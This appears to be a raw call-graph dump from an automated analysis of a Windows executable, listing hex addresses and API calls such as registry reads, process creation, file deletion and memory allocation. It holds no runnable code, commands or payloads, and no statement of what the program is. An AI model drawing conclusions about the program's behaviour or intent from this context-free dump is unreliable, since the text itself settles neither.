6012 4068e4 5711->6012 5714 4066f0 5717 403340 4 API calls 5714->5717 5715 4066fe 5716 403454 4 API calls 5715->5716 5718 406711 5716->5718 5719 4066fc 5717->5719 5720 403340 4 API calls 5718->5720 5721 403198 4 API calls 5719->5721 5720->5719 5722 406733 5721->5722 5723 406638 5722->5723 5724 406642 5723->5724 5725 406665 5723->5725 6018 406950 5724->6018 5727 40322c 4 API calls 5725->5727 5729 40666e 5727->5729 5728 406649 5728->5725 5730 406654 5728->5730 5729->5669 5731 403340 4 API calls 5730->5731 5732 406662 5731->5732 5732->5669 5734 403344 5733->5734 5735 4033a5 5733->5735 5736 4031e8 5734->5736 5737 40334c 5734->5737 5739 4031fc 5736->5739 5741 403254 4 API calls 5736->5741 5737->5735 5738 40335b 5737->5738 5742 4031e8 4 API calls 5737->5742 5743 403254 4 API calls 5738->5743 5740 403228 5739->5740 5744 4025ac 4 API calls 5739->5744 5740->5671 5741->5739 5742->5738 5745 403375 5743->5745 5744->5740 5746 4031e8 4 API calls 5745->5746 5747 4033a1 5746->5747 5747->5671 5749 403154 4 API calls 5748->5749 5750 402f29 5749->5750 6024 402bcc 5750->6024 5752 402f51 5752->5752 5754 408da8 4 API calls 5753->5754 5755 408df4 5754->5755 5755->5659 5757 405859 5756->5757 5758 405930 5 API calls 5757->5758 5759 40586b 5758->5759 5759->5759 5767 40955b 5760->5767 5761 409590 5764 40959d GetUserDefaultLangID 5761->5764 5768 409592 5761->5768 5762 409594 5778 407024 GetModuleHandleA GetProcAddress 5762->5778 5764->5768 5766 40956f 5772 409884 5766->5772 5767->5761 5767->5762 5767->5766 5768->5766 5769 4095cb GetACP 5768->5769 5770 4095ef 5768->5770 5769->5766 5769->5768 5770->5766 5771 409615 GetACP 5770->5771 5771->5766 5771->5770 5773 40988c 5772->5773 5777 4098c6 5772->5777 5774 403420 4 API calls 5773->5774 5773->5777 5775 4098c0 5774->5775 5836 408e80 5775->5836 5777->5651 5779 407067 5778->5779 5780 40705e 5778->5780 5781 407070 5779->5781 5782 4070a8 5779->5782 5791 403198 4 API calls 5780->5791 5799 406f68 5781->5799 5784 406f68 RegOpenKeyExA 5782->5784 5786 4070c1 5784->5786 5785 407089 5787 4070de 5785->5787 5802 406f5c 5785->5802 5786->5787 5788 406f5c 6 API calls 5786->5788 5789 40322c 4 API calls 5787->5789 5792 4070d5 RegCloseKey 5788->5792 5793 4070eb 5789->5793 5795 407120 5791->5795 5792->5787 5805 4032fc 5793->5805 5797 403198 4 API calls 5795->5797 5798 407128 5797->5798 5798->5768 5800 406f73 5799->5800 5801 406f79 RegOpenKeyExA 5799->5801 5800->5801 5801->5785 5819 406e10 5802->5819 5806 403300 5805->5806 5807 40333f 5805->5807 5808 4031e8 5806->5808 5809 40330a 5806->5809 5807->5780 5815 4031fc 5808->5815 5816 403254 4 API calls 5808->5816 5810 403334 5809->5810 5811 40331d 5809->5811 5814 4034f0 4 API calls 5810->5814 5812 4034f0 4 API calls 5811->5812 5817 403322 5812->5817 5813 403228 5813->5780 5814->5817 5815->5813 5818 4025ac 4 API calls 5815->5818 5816->5815 5817->5780 5818->5813 5820 406e36 RegQueryValueExA 5819->5820 5821 406e59 5820->5821 5826 406e7b 5820->5826 5822 406e73 5821->5822 5821->5826 5827 403278 4 API calls 5821->5827 5828 403420 4 API calls 5821->5828 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5787 5826->5823 5827->5821 5829 406eb0 RegQueryValueExA 5828->5829 5829->5820 5830 406ecc 5829->5830 5830->5826 5831 4034f0 4 API calls 5830->5831 5832 406f0e 5831->5832 5833 406f20 5832->5833 5835 403420 4 API calls 5832->5835 5834 4031e8 4 API calls 5833->5834 5834->5826 5835->5833 5837 408e8e 5836->5837 5839 408ea6 5837->5839 5849 408e18 5837->5849 5840 408e18 4 API calls 5839->5840 5841 408eca 5839->5841 5840->5841 5842 407918 InterlockedExchange 5841->5842 5843 408ee5 5842->5843 5844 408e18 4 API calls 5843->5844 5846 408ef8 5843->5846 5844->5846 5845 408e18 4 API calls 5845->5846 5846->5845 5847 403278 4 API calls 5846->5847 5848 408f27 5846->5848 5847->5846 5848->5777 5850 405880 4 API calls 5849->5850 5851 408e29 5850->5851 5851->5839 5901 406a58 5852->5901 5855 406d26 5857 406a58 5 API calls 5855->5857 5859 406d72 5855->5859 5858 406d36 5857->5858 5860 406d42 5858->5860 5862 406a34 7 API calls 5858->5862 5909 406888 5859->5909 5860->5859 5865 406a58 5 API calls 5860->5865 5871 406d67 5860->5871 5862->5860 5867 406d5b 5865->5867 5866 406638 5 API calls 5868 406d87 5866->5868 5869 406a34 7 API calls 5867->5869 5867->5871 5870 40322c 4 API calls 5868->5870 5869->5871 5872 406d91 5870->5872 5871->5859 5921 406cc8 GetWindowsDirectoryA 5871->5921 5873 4031b8 4 API calls 5872->5873 5874 406dab 5873->5874 5874->5697 5876 409244 5875->5876 5877 406638 5 API calls 5876->5877 5878 40925d 5877->5878 5879 40322c 4 API calls 5878->5879 5884 409268 5879->5884 5881 406978 6 API calls 5881->5884 5882 4033b4 4 API calls 5882->5884 5883 408dd8 4 API calls 5883->5884 5884->5881 5884->5882 5884->5883 5885 405880 4 API calls 5884->5885 5887 4092e4 5884->5887 5961 4091b0 5884->5961 5969 409034 5884->5969 5885->5884 5888 40322c 4 API calls 5887->5888 5889 4092ef 5888->5889 5890 4031b8 4 API calls 5889->5890 5891 409309 5890->5891 5892 403198 4 API calls 5891->5892 5893 409311 5892->5893 5893->5697 5895 405198 19 API calls 5894->5895 5896 404ca2 5895->5896 5896->5697 5898 408dc8 5897->5898 5997 408c80 5898->5997 5902 4034f0 4 API calls 5901->5902 5903 406a6b 5902->5903 5904 406a82 GetEnvironmentVariableA 5903->5904 5908 406a95 5903->5908 5923 406dec 5903->5923 5904->5903 5905 406a8e 5904->5905 5906 403198 4 API calls 5905->5906 5906->5908 5908->5855 5918 406a34 5908->5918 5910 403414 5909->5910 5911 4068ab GetFullPathNameA 5910->5911 5912 4068b7 5911->5912 5913 4068ce 5911->5913 5912->5913 5914 4068bf 5912->5914 5915 40322c 4 API calls 5913->5915 5916 403278 4 API calls 5914->5916 5917 4068cc 5915->5917 5916->5917 5917->5866 5927 4069dc 5918->5927 5922 406ce9 5921->5922 5922->5859 5924 406dfa 5923->5924 5925 4034f0 4 API calls 5924->5925 5926 406e08 5925->5926 5926->5903 5934 406978 5927->5934 5929 4069fe 5930 406a06 GetFileAttributesA 5929->5930 5931 406a1b 5930->5931 5932 403198 4 API calls 5931->5932 5933 406a23 5932->5933 5933->5855 5944 406744 5934->5944 5936 4069b0 5939 4069c6 5936->5939 5940 4069bb 5936->5940 5938 406989 5938->5936 5951 406970 CharPrevA 5938->5951 5952 403454 5939->5952 5941 40322c 4 API calls 5940->5941 5943 4069c4 5941->5943 5943->5929 5947 406755 5944->5947 5945 4067b9 5946 406680 IsDBCSLeadByte 5945->5946 5948 4067b4 5945->5948 5946->5948 5947->5945 5949 406773 5947->5949 5948->5938 5949->5948 5959 406680 IsDBCSLeadByte 5949->5959 5951->5938 5953 403486 5952->5953 5954 403459 5952->5954 5955 403198 4 API calls 5953->5955 5954->5953 5957 40346d 5954->5957 5956 40347c 5955->5956 5956->5943 5958 403278 4 API calls 5957->5958 5958->5956 5960 406694 5959->5960 5960->5949 5962 403198 4 API calls 5961->5962 5964 4091d1 5962->5964 5966 4091fe 5964->5966 5978 4032a8 5964->5978 5981 403494 5964->5981 5967 403198 4 API calls 5966->5967 5968 409213 5967->5968 5968->5884 5985 408f70 5969->5985 5971 40904a 5972 40904e 5971->5972 5991 406a48 5971->5991 5972->5884 5975 409081 5994 408fac 5975->5994 5979 403278 4 API calls 5978->5979 5980 4032b5 5979->5980 5980->5964 5982 403498 5981->5982 5984 4034c3 5981->5984 5983 4034f0 4 API calls 5982->5983 5983->5984 5984->5964 5986 408f7a 5985->5986 5987 408f7e 5985->5987 5986->5971 5988 408fa0 SetLastError 5987->5988 5989 408f87 Wow64DisableWow64FsRedirection 5987->5989 5990 408f9b 5988->5990 5989->5990 5990->5971 5992 4069dc 7 API calls 5991->5992 5993 406a52 GetLastError 5992->5993 5993->5975 5995 408fb1 Wow64RevertWow64FsRedirection 5994->5995 5996 408fbb 5994->5996 5995->5996 5996->5884 5998 403198 4 API calls 5997->5998 6004 408cb1 5997->6004 5998->6004 5999 408cdc 6000 4031b8 4 API calls 5999->6000 6002 408d69 6000->6002 6001 408cc8 6005 4032fc 4 API calls 6001->6005 6002->5697 6003 403278 4 API calls 6003->6004 6004->5999 6004->6001 6004->6003 6006 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6006 6005->5999 6006->6004 6008 406744 IsDBCSLeadByte 6007->6008 6010 406835 6008->6010 6009 40687f 6009->5709 6010->6009 6011 406680 IsDBCSLeadByte 6010->6011 6011->6010 6013 4068f3 6012->6013 6014 406820 IsDBCSLeadByte 6013->6014 6016 4068fe 6014->6016 6015 4066ea 6015->5714 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 406957 6018->6019 6020 40695b 6018->6020 6019->5728 6023 406970 CharPrevA 6020->6023 6022 40696c 6022->5728 6023->6022 6025 402bd5 RaiseException 6024->6025 6026 402be6 6024->6026 6025->6026 6026->5752 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6713 403f7d 6714 403fa2 6713->6714 6717 403f84 6713->6717 6716 403e8e 4 API calls 6714->6716 6714->6717 6715 403f8c 6716->6717 6717->6715 6718 402674 4 API calls 6717->6718 6719 403fca 6718->6719 6726 403d02 6733 403d12 6726->6733 6727 403ddf ExitProcess 6728 403db8 6730 403cc8 4 API calls 6728->6730 6729 403dea 6731 403dc2 6730->6731 6732 403cc8 4 API calls 6731->6732 6734 403dcc 6732->6734 6733->6727 6733->6728 6733->6729 6733->6733 6736 403da4 6733->6736 6737 403d8f MessageBoxA 6733->6737 6746 4019dc 6734->6746 6742 403fe4 6736->6742 6737->6728 6739 403dd1 6739->6727 6739->6729 6743 403fe8 6742->6743 6744 403f07 4 API calls 6743->6744 6745 404006 6744->6745 6747 401abb 6746->6747 6748 4019ed 6746->6748 6747->6739 6749 401a04 RtlEnterCriticalSection 6748->6749 6750 401a0e LocalFree 6748->6750 6749->6750 6751 401a41 6750->6751 6752 401a2f VirtualFree 6751->6752 6753 401a49 6751->6753 6752->6751 6754 401a70 LocalFree 6753->6754 6755 401a87 6753->6755 6754->6754 6754->6755 6756 401aa9 RtlDeleteCriticalSection 6755->6756 6757 401a9f RtlLeaveCriticalSection 6755->6757 6756->6739 6757->6756 6310 404206 6311 40420a 6310->6311 6312 4041cc 6310->6312 6313 404282 6311->6313 6314 403154 4 API calls 6311->6314 6315 404323 6314->6315 6316 402c08 6319 402c82 6316->6319 6320 402c19 6316->6320 6317 402c56 RtlUnwind 6318 403154 4 API calls 6317->6318 6318->6319 6320->6317 6320->6319 6323 402b28 6320->6323 6324 402b31 RaiseException 6323->6324 6325 402b47 6323->6325 6324->6325 6325->6317 6326 408c10 6327 408c17 6326->6327 6328 403198 4 API calls 6327->6328 6336 408cb1 6328->6336 6329 408cdc 6330 4031b8 4 API calls 6329->6330 6332 408d69 6330->6332 6331 408cc8 6334 4032fc 4 API calls 6331->6334 6333 403278 4 API calls 6333->6336 6334->6329 6335 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6335->6336 6336->6329 6336->6331 6336->6333 6336->6335 6337 40a011 6338 40a036 6337->6338 6339 407918 InterlockedExchange 6338->6339 6341 40a060 6339->6341 6340 40a070 6347 4076ac SetEndOfFile 6340->6347 6341->6340 6342 409aa0 4 API calls 6341->6342 6342->6340 6344 40a08c 6345 4025ac 4 API calls 6344->6345 6346 40a0c3 6345->6346 6348 4076c3 6347->6348 6349 4076bc 6347->6349 6348->6344 6350 40748c 21 API calls 6349->6350 6350->6348 6762 409916 6763 409918 6762->6763 6764 40993a 6763->6764 6765 409956 CallWindowProcA 6763->6765 6765->6764 6078 407017 6079 407008 SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6464 40723f 6461->6464 6466 40724b 6461->6466 6463 40722d 6462->6463 6463->6447 6468 4071d0 6464->6468 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6463 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6463 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5579 40168f 5576->5579 5577 4016cf 5580 40132c 5577->5580 5578 4016a9 VirtualFree 5578->5579 5579->5577 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A25CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A25CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 6182->6164 6185 40357c 6183->6185 6184 4035a0 6186 4035b1 6184->6186 6187 4035b8 6184->6187 6185->6184 6189 4035d0 6185->6189 6190 40359b 6185->6190 6192 4035b6 6185->6192 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6184 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A25CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 